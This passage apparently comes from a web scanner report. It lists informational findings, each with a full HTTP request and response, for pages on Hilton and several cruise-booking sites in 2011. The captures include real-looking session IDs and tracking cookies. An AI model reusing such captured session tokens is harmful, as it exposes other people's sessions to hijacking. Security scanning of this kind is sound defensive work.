Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www1.hilton.com/en_US/hi/customersupport/index.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; cross-sell=hi; mmcore.tst=0.482; mmid=510181832%7CCwAAAAodekFwyAYAAA%3D%3D; mmcore.pd=510181832%7CCwAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrCSTO=T; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317637060085:ss=1317635584777

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml", CP="NOI DSP DEVa TAIa OUR BUS UNI"
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Length: 25881
Date: Mon, 03 Oct 2011 13:17:21 GMT
Connection: close
Vary: Accept-Encoding


<html>
<head>
<link rel="stylesheet" href="/en/ww/standard.css" type="text/css">
<link rel="stylesheet" type="text/css" href="brg_style.css" />
<title>Our Best Rates. Guaranteed. Claim Form</ti
...[SNIP]...
24.16. https://secure.hilton.com/en/hi/login/login.jhtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.hilton.com
Path:   /en/hi/login/login.jhtml

Request

GET /en/hi/login/login.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ?_requestid=21183 HTTP/1.1
Host: secure.hilton.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hilton.com/en/hi/info/site_usage.jhtml
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; cross-sell=hi; ClrCSTO=T; ClrSSID=1317646383790-9086; mmcore.tst=0.391; mmid=315413507%7CCgAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; mmcore.pd=315413507%7CCgAAAAodekFwyAYAAA%3D%3D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635914358:ss=1317635584777; JSESSIONID=S2VXAICTPUQJWCSGBIYMVCQ

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml", CP="NOI DSP DEVa TAIa OUR BUS UNI"
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
Content-Length: 33818
Date: Mon, 03 Oct 2011 12:58:38 GMT
Connection: keep-alive


<!--suppress top nav sign in widget -->


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


    <HTML>
<HEAD>

           <TITLE>Login Page</TITLE>
           
           
           <LINK re
...[SNIP]...
24.17. http://www.celebritycruises.com/html/en_US/plan-and-book/plan-your-cruise/result-markup.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.celebritycruises.com
Path:   /html/en_US/plan-and-book/plan-your-cruise/result-markup.html

Request

GET /html/en_US/plan-and-book/plan-your-cruise/result-markup.html HTTP/1.1
Host: www.celebritycruises.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/plain, */*
Referer: http://www.celebritycruises.com/search/vacationSearchResults.do?isWidget=false&dest=ANY&sailStartDate=ANY&sailEndDate=ANY&ship=ANY&port=ANY&duration=ANY&includeAdjascentPorts=Y&promoid=&promoType=&promotionTypeId=&priceProgram=&sortBy=4&startRow=0&count=10&cruiseType=CO&cruiseInt=Y&isCrieriaExcluded=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=000052bP0YHmMBHoM8_sGg4WKHr:12hdbd027; wuc=USA; s_pers=%20s_evar44cvp%3D%255B%255B'Direct%252520Load'%252C'1317646043868'%255D%255D%7C1475498843868%3B%20s_evar46cvp%3D%255B%255B'Direct%252520Load'%252C'1317646043871'%255D%255D%7C1475498843871%3B; s_sess=%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Mon, 19 Sep 2011 21:38:22 GMT
Accept-Ranges: bytes
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 4278
Date: Mon, 03 Oct 2011 12:47:22 GMT
Connection: close


<div class="packageDetail clearfix">

   <figure style="background:url({mapThumbnail}) no-repeat;">
   <div class="mapControls"><a href="/search/mapOverlay.do?packageid={packageID}" rel="lightbox nof
...[SNIP]...
24.18. http://www.cruises.com/ajaxhtml/filterdynamic.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruises.com
Path:   /ajaxhtml/filterdynamic.do

Request

GET /ajaxhtml/filterdynamic.do?http://www.cruises.com/promotion/weekend-cruises.do HTTP/1.1
Host: www.cruises.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/html; charset=utf-8
Accept: text/html, */*; q=0.01
Referer: http://www.cruises.com/promotion/weekend-cruises.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WTHGeoLocation=CountryCode=US; WDVID=%7BFFB49BDE%2DB2EE%2D4D7A%2DB652%2DA6AA2F06AB63%7D; ASPSESSIONIDAQASDRCS=PFGAFPMACOENMMLEIOFADKLB; NSC_WJQ-DSVJTFT.DPN=ffffffff095b1c9c45525d5f4f58455e445a4a423662; _msuuid_7871bv11074=7200E557-607F-4F1A-82DB-75086671DFA2; __utmx=229343950.; __utmxx=229343950.; WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D; sid=6383; JSESSIONID=12B50B9A092975EDA676566C18A72E04; NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d2c45525d5f4f58455e445a4a423660; __utma=229343950.1971735135.1317645653.1317645653.1317645653.1; __utmb=229343950.9.9.1317645699652; __utmc=229343950; __utmz=229343950.1317645653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=229343950.|1=SearchWidget=Dynamic=1

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:42:40 GMT
Server: Apache
Set-Cookie: WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D; Expires=Thu, 30-Sep-2021 12:42:41 GMT; Path=/
Set-Cookie: IncludeAlumniRates=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: IncludeSeniorRates=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: AlumniCruiseId=false; Expires=Wed, 02-Nov-2011 12:42:41 GMT; Path=/
Set-Cookie: shoppingZipCode="Zip Code"; Expires=Wed, 02-Nov-2011 12:42:41 GMT; Path=/
Set-Cookie: EmailSignupComplete=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: AFF%5FCID=%22%22; Expires=Wed, 02-Nov-2011 12:42:41 GMT; Path=/
Set-Cookie: sid=6383; Path=/
Content-Type: text/html
Set-Cookie: NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d2c45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 12:44:41 GMT;path=/
Cache-Control: private
Content-Length: 37720


<script language="JavaScript">
var CruiseALLArray = new Array("('All Ships ','ALL',true,true)");
var Cruise325Array = new Array("('All Ships ','ALL',true,true)",
"('Azamara Journey
...[SNIP]...
24.19. http://www.cruises.com/code/webdata/webdataregister.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruises.com
Path:   /code/webdata/webdataregister.asp

Request

GET /code/webdata/webdataregister.asp?webdataID=1501 HTTP/1.1
Host: www.cruises.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cruises.com/promotion/balcony-suite-cruises.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WTHGeoLocation=CountryCode=US; WDVID=%7BFFB49BDE%2DB2EE%2D4D7A%2DB652%2DA6AA2F06AB63%7D; WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D; ASPSESSIONIDAQASDRCS=PFGAFPMACOENMMLEIOFADKLB; NSC_WJQ-DSVJTFT.DPN=ffffffff095b1c9c45525d5f4f58455e445a4a423662; _msuuid_7871bv11074=7200E557-607F-4F1A-82DB-75086671DFA2; __utmx=229343950.; __utmxx=229343950.; __utma=229343950.1971735135.1317645653.1317645653.1317645653.1; __utmb=229343950.6.9.1317645699652; __utmc=229343950; __utmz=229343950.1317645653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=229343950.|1=SearchWidget=Dynamic=1; NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d2c45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:41:24 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Cteonnt-Length: 32
Content-Type: text/html
Cache-control: private
Content-Length: 32

function DummyBrowserCheck() {};
24.20. http://www.cruises.com/i/shadow.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruises.com
Path:   /i/shadow.png

Request

GET /i/shadow.png HTTP/1.1
Host: www.cruises.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cruises.com/results.do?searchOrigin=refine&places=ALL&days=ALL&Month=ALL&dd=ALL&d=&d2=&fd=2&c=ALL&v=ALL&p=ALL&shoppingZipCode=10010&IncludeSeniorRates=true&IncludeAlumniRates=true&AlumniCruiseId=44&sort_by=7&Search.x=28&Search.y=17&Search=Search
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WTHGeoLocation=CountryCode=US; WDVID=%7BFFB49BDE%2DB2EE%2D4D7A%2DB652%2DA6AA2F06AB63%7D; ASPSESSIONIDAQASDRCS=PFGAFPMACOENMMLEIOFADKLB; NSC_WJQ-DSVJTFT.DPN=ffffffff095b1c9c45525d5f4f58455e445a4a423662; _msuuid_7871bv11074=7200E557-607F-4F1A-82DB-75086671DFA2; __utmx=229343950.; __utmxx=229343950.; JSESSIONID=12B50B9A092975EDA676566C18A72E04; WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D; IncludeAlumniRates=true; IncludeSeniorRates=true; AlumniCruiseId=44; shoppingZipCode=10010; AFF%5FCID=%22%22; sid=6383; NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d2c45525d5f4f58455e445a4a423660; __utma=229343950.1971735135.1317645653.1317645653.1317645653.1; __utmb=229343950.16.8.1317645879081; __utmc=229343950; __utmz=229343950.1317645653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=229343950.|1=SearchWidget=Dynamic=1

Response

HTTP/1.1 404 file not found
Date: Mon, 03 Oct 2011 12:44:21 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Cteonnt-Length: 31431
Content-Type: text/html
Set-Cookie: AFF%5FCID=%22%22; expires=Wed, 02-Nov-2011 04:00:00 GMT; path=/
Cache-control: private
Content-Length: 31431


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
   <head>
        <title>Page unavailable</title>
       
               <meta name="ROBOTS" content="ALL,NOODP" />
               <meta name="GOOG
...[SNIP]...
24.21. http://www.cruises.com/idle.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruises.com
Path:   /idle.do

Request

GET /idle.do?msg=2 HTTP/1.1
Host: www.cruises.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cruises.com/results.do?searchOrigin=refine&places=ALL&days=ALL&Month=ALL&dd=ALL&d=&d2=&fd=2&c=ALL&v=ALL&p=ALL&shoppingZipCode=10010&IncludeSeniorRates=true&IncludeAlumniRates=true&AlumniCruiseId=44&sort_by=7&Search.x=28&Search.y=17&Search=Search
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WTHGeoLocation=CountryCode=US; WDVID=%7BFFB49BDE%2DB2EE%2D4D7A%2DB652%2DA6AA2F06AB63%7D; ASPSESSIONIDAQASDRCS=PFGAFPMACOENMMLEIOFADKLB; NSC_WJQ-DSVJTFT.DPN=ffffffff095b1c9c45525d5f4f58455e445a4a423662; _msuuid_7871bv11074=7200E557-607F-4F1A-82DB-75086671DFA2; __utmx=229343950.; __utmxx=229343950.; JSESSIONID=12B50B9A092975EDA676566C18A72E04; __utma=229343950.1971735135.1317645653.1317645653.1317645653.1; __utmb=229343950.18.9.1317645980928; __utmc=229343950; __utmz=229343950.1317645653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=229343950.|1=SearchWidget=Dynamic=1; WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D; IncludeAlumniRates=true; IncludeSeniorRates=true; AlumniCruiseId=44; shoppingZipCode=10010; EmailSignupComplete=Yes; AFF%5FCID=%22%22; sid=6383; NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d0e45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:46:03 GMT
Server: Apache
Set-Cookie: WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D; Expires=Thu, 30-Sep-2021 12:46:03 GMT; Path=/
Set-Cookie: IncludeAlumniRates=true; Expires=Wed, 02-Nov-2011 12:46:03 GMT; Path=/
Set-Cookie: IncludeSeniorRates=true; Expires=Wed, 02-Nov-2011 12:46:03 GMT; Path=/
Set-Cookie: AlumniCruiseId=44; Expires=Wed, 02-Nov-2011 12:46:03 GMT; Path=/
Set-Cookie: shoppingZipCode=10010; Expires=Wed, 02-Nov-2011 12:46:03 GMT; Path=/
Set-Cookie: EmailSignupComplete=Yes; Expires=Tue, 02-Oct-2012 12:46:03 GMT; Path=/
Set-Cookie: AFF%5FCID=%22%22; Expires=Wed, 02-Nov-2011 12:46:03 GMT; Path=/
Set-Cookie: sid=6383; Path=/
ntCoent-Length: 45
Content-Type: text/html
Set-Cookie: NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d0e45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 12:48:03 GMT;path=/
Cache-Control: private
Content-Length: 45


<!--
   This is an idle action ! />
-->
24.22. http://www.cruisesonly.com/ajaxhtml/filterdynamic.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruisesonly.com
Path:   /ajaxhtml/filterdynamic.do

Request

GET /ajaxhtml/filterdynamic.do?http://www.cruisesonly.com/promotion/bermuda-cruises.do HTTP/1.1
Host: www.cruisesonly.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/html; charset=utf-8
Accept: text/html, */*; q=0.01
Referer: http://www.cruisesonly.com/promotion/bermuda-cruises.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7BD8541B8C%2D79AE%2D4C96%2D9B36%2D0670FE94C35D%7D; ASPSESSIONIDSSCCSDSR=LNIDLMMAFLKGLMDCEIKIDAKI; NSC_WJQ-DSVJTFTPOMZ.DPN=ffffffff095b1c5645525d5f4f58455e445a4a423660; BrowserTest=ON; _msuuid_7879jl5289=63E87AE9-BEEA-49B1-9132-2AF4FA00DDDD; JSESSIONID=E5DDBE0407B36DF2815ADD375CCA88F0; WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D1c8fe390ed9e4354eaa4e6f; IncludeAlumniRates=1c8fe3904be4744e95f12c08; AlumniCruiseId=false; shoppingZipCode="Zip Code"; sid=6386; partnerStamp=21960764; NSC_WJQ-BQDI-DSVJTFTPOMZ.DPN=ffffffff095b1d3845525d5f4f58455e445a4a423660; AFF%5FCID=6386; __utma=204213570.186654333.1317645662.1317645662.1317645662.1; __utmb=204213570.6.9.1317645669909; __utmc=204213570; __utmz=204213570.1317645662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:45:28 GMT
Server: Apache
Set-Cookie: WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D1c8fe390ed9e4354eaa4e6f; Expires=Thu, 30-Sep-2021 12:45:29 GMT; Path=/
Set-Cookie: IncludeAlumniRates=1c8fe3904be4744e95f12c08; Expires=Wed, 02-Nov-2011 12:45:29 GMT; Path=/
Set-Cookie: IncludeSeniorRates=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: AlumniCruiseId=false; Expires=Wed, 02-Nov-2011 12:45:29 GMT; Path=/
Set-Cookie: shoppingZipCode="Zip Code"; Expires=Wed, 02-Nov-2011 12:45:29 GMT; Path=/
Set-Cookie: EmailSignupComplete=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: AFF%5FCID=6386; Expires=Wed, 02-Nov-2011 12:45:29 GMT; Path=/
Set-Cookie: sid=6386; Path=/
Content-Type: text/html
Set-Cookie: NSC_WJQ-BQDI-DSVJTFTPOMZ.DPN=ffffffff095b1d3845525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 12:47:29 GMT;path=/
Cache-Control: private
Content-Length: 37692


<script language="JavaScript">
var CruiseALLArray = new Array("('All Ships ','ALL',true,true)");
var Cruise325Array = new Array("('All Ships ','ALL',true,true)",
"('Azamara Journey
...[SNIP]...
24.23. http://www.cruisesonly.com/code/webdata/webdataregister.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruisesonly.com
Path:   /code/webdata/webdataregister.asp

Request

GET /code/webdata/webdataregister.asp?webdataID=1910 HTTP/1.1
Host: www.cruisesonly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cruisesonly.com/groupcruises/promos/whatisgroup.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7BD8541B8C%2D79AE%2D4C96%2D9B36%2D0670FE94C35D%7D; ASPSESSIONIDSSCCSDSR=LNIDLMMAFLKGLMDCEIKIDAKI; NSC_WJQ-DSVJTFTPOMZ.DPN=ffffffff095b1c5645525d5f4f58455e445a4a423660; BrowserTest=ON; _msuuid_7879jl5289=63E87AE9-BEEA-49B1-9132-2AF4FA00DDDD; WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D; sid=6386; JSESSIONID=E5DDBE0407B36DF2815ADD375CCA88F0; NSC_WJQ-BQDI-DSVJTFTPOMZ.DPN=ffffffff095b1d2245525d5f4f58455e445a4a423660; __utma=204213570.186654333.1317645662.1317645662.1317645662.1; __utmb=204213570.3.9.1317645669909; __utmc=204213570; __utmz=204213570.1317645662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:42:13 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Cteonnt-Length: 34
Content-Type: text/html
Cache-control: private
Content-Length: 34

function DummyBrowserCheck11() {};
24.24. http://www.cruisesonly.com/groupcruises/email/email_popup.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruisesonly.com
Path:   /groupcruises/email/email_popup.asp

Request

GET /groupcruises/email/email_popup.asp HTTP/1.1
Host: www.cruisesonly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cruisesonly.com/groupcruises/promos/whatisgroup.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7BD8541B8C%2D79AE%2D4C96%2D9B36%2D0670FE94C35D%7D; ASPSESSIONIDSSCCSDSR=LNIDLMMAFLKGLMDCEIKIDAKI; NSC_WJQ-DSVJTFTPOMZ.DPN=ffffffff095b1c5645525d5f4f58455e445a4a423660; BrowserTest=ON; _msuuid_7879jl5289=63E87AE9-BEEA-49B1-9132-2AF4FA00DDDD; WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D; sid=6386; JSESSIONID=E5DDBE0407B36DF2815ADD375CCA88F0; NSC_WJQ-BQDI-DSVJTFTPOMZ.DPN=ffffffff095b1d2245525d5f4f58455e445a4a423660; __utma=204213570.186654333.1317645662.1317645662.1317645662.1; __utmb=204213570.4.9.1317645669909; __utmc=204213570; __utmz=204213570.1317645662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:42:41 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Cteonnt-Length: 2978
Content-Type: text/html
Cache-control: private
Content-Length: 2978


<link rel="stylesheet" type="text/css" href="/includes/stylesheet_j.css">


<style type="text/css">
   xbody{background-color:#383838;}
</style>


<body>    
<head><title>Email Signup</t
...[SNIP]...
24.25. http://www.cruisesonly.com/includes/search_ads.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruisesonly.com
Path:   /includes/search_ads.css

Request

GET /includes/search_ads.css HTTP/1.1
Host: www.cruisesonly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.cruisesonly.com/promotion/bermuda-cruises.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7BD8541B8C%2D79AE%2D4C96%2D9B36%2D0670FE94C35D%7D; ASPSESSIONIDSSCCSDSR=LNIDLMMAFLKGLMDCEIKIDAKI; NSC_WJQ-DSVJTFTPOMZ.DPN=ffffffff095b1c5645525d5f4f58455e445a4a423660; BrowserTest=ON; _msuuid_7879jl5289=63E87AE9-BEEA-49B1-9132-2AF4FA00DDDD; JSESSIONID=E5DDBE0407B36DF2815ADD375CCA88F0; __utma=204213570.186654333.1317645662.1317645662.1317645662.1; __utmb=204213570.5.9.1317645669909; __utmc=204213570; __utmz=204213570.1317645662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D1c8fe390ed9e4354eaa4e6f; IncludeAlumniRates=1c8fe3904be4744e95f12c08; AlumniCruiseId=false; shoppingZipCode="Zip Code"; sid=6386; partnerStamp=21960764; AFF%5FCID=6386; NSC_WJQ-BQDI-DSVJTFTPOMZ.DPN=ffffffff095b1d3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 404 file not found
Date: Mon, 03 Oct 2011 12:45:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Cteonnt-Length: 46271
Content-Type: text/html
Set-Cookie: AFF%5FCID=6386; expires=Wed, 02-Nov-2011 04:00:00 GMT; path=/
Cache-control: private
Content-Length: 46271


<noscript>
<META HTTP-EQUIV="Refresh" CONTENT="0;URL=/lib/global/jscookiehelp.asp?js=N">
</noscript>
<script language='Javascript'><!--function DummyBrowserCheck11() {
...[SNIP]...
24.26. http://www.cruisesonly.com/includes/stylesheet_test.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruisesonly.com
Path:   /includes/stylesheet_test.css

Request

GET /includes/stylesheet_test.css HTTP/1.1
Host: www.cruisesonly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.cruisesonly.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7BD8541B8C%2D79AE%2D4C96%2D9B36%2D0670FE94C35D%7D; WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D; ASPSESSIONIDSSCCSDSR=LNIDLMMAFLKGLMDCEIKIDAKI; NSC_WJQ-DSVJTFTPOMZ.DPN=ffffffff095b1c5645525d5f4f58455e445a4a423660; BrowserTest=ON; NSC_WJQ-BQDI-DSVJTFTPOMZ.DPN=ffffffff095b1d2245525d5f4f58455e445a4a423660; _msuuid_7879jl5289=63E87AE9-BEEA-49B1-9132-2AF4FA00DDDD; __utma=204213570.186654333.1317645662.1317645662.1317645662.1; __utmb=204213570.2.9.1317645669909; __utmc=204213570; __utmz=204213570.1317645662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 file not found
Date: Mon, 03 Oct 2011 12:40:52 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Cteonnt-Length: 45933
Content-Type: text/html
Cache-control: private
Content-Length: 45933


<noscript>
<META HTTP-EQUIV="Refresh" CONTENT="0;URL=/lib/global/jscookiehelp.asp?js=N">
</noscript>
<script language='Javascript'><!--function DummyBrowserCheck11() {
...[SNIP]...
24.27. http://www.cruisesonly.com/lib/javascript/ajax/logerror.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruisesonly.com
Path:   /lib/javascript/ajax/logerror.js

Request

GET /lib/javascript/ajax/logerror.js HTTP/1.1
Host: www.cruisesonly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cruisesonly.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
